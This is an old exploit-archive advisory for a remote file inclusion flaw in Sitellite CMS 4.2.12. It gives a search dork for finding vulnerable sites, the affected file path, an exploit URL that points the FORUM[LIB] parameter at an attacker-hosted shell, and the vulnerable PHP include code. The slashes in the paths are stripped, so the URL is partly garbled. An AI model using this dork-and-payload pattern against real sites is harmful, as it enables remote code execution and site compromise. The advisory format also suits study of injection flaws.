[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Sitellite CMS <= 4.2.12 (559668.php) Remote File Inclusion Vulnerability
# Published : 2007-06-14
# Author : o0xxdark0o
# Previous Title : phpMyInventory 2.8 (global.inc.php) Remote File Inclusion Vulnerability
# Next Title : PHP::HTML 0.6.4 (phphtml.php) Remote File Inclusion Vulnerability
*sitellite*<http://www.sitelliteforge.com/index/siteforge-download-action/proj.sitellite?dl=sitellite-4.2.12-stable.tar.gz>
v 4.2.12
DORK : "powered by Sitellite"
FOUND BY : o0xxdark0o
o0xxdark0o[at]msn.com
Website: http://www.sitellite.org/
DOWNLOAD : http://www.sitelliteforge.com/index/siteforge-app/proj.sitellite
REMOTE FILE ICLUDE
############################################################
FILE :
PATHsaflibPEARPhpDocumentorDocumentationtestsbug-559668.php
############################################################
EXP:
xxx.compathsaflibPEARPhpDocumentorDocumentationtests559668.php?FORUM[LIB]=Shell
?
############################################################
CODE: on line 4
<?php
/** @package tests */
/** include tests */
require_once $FORUM['LIB'] . '/classes/db/PearDb.php';
require PEAR . 'test' . 'me';
include('file.ext');
include 'file.ext';
include(PEAR . 'test' . 'me');
?>
############################################################
thanks for all my friends.. str0ke ... mr_6.1.9 .... oxdo .... cold z3ro
www.hach-teach.org - www.3asfh.com
############################################################
BY : o0xxdark0o
o0xxdark0o@msn.com
PhpDocumentor directory is .htaccess'ed
# www.Syue.com [2007-06-14]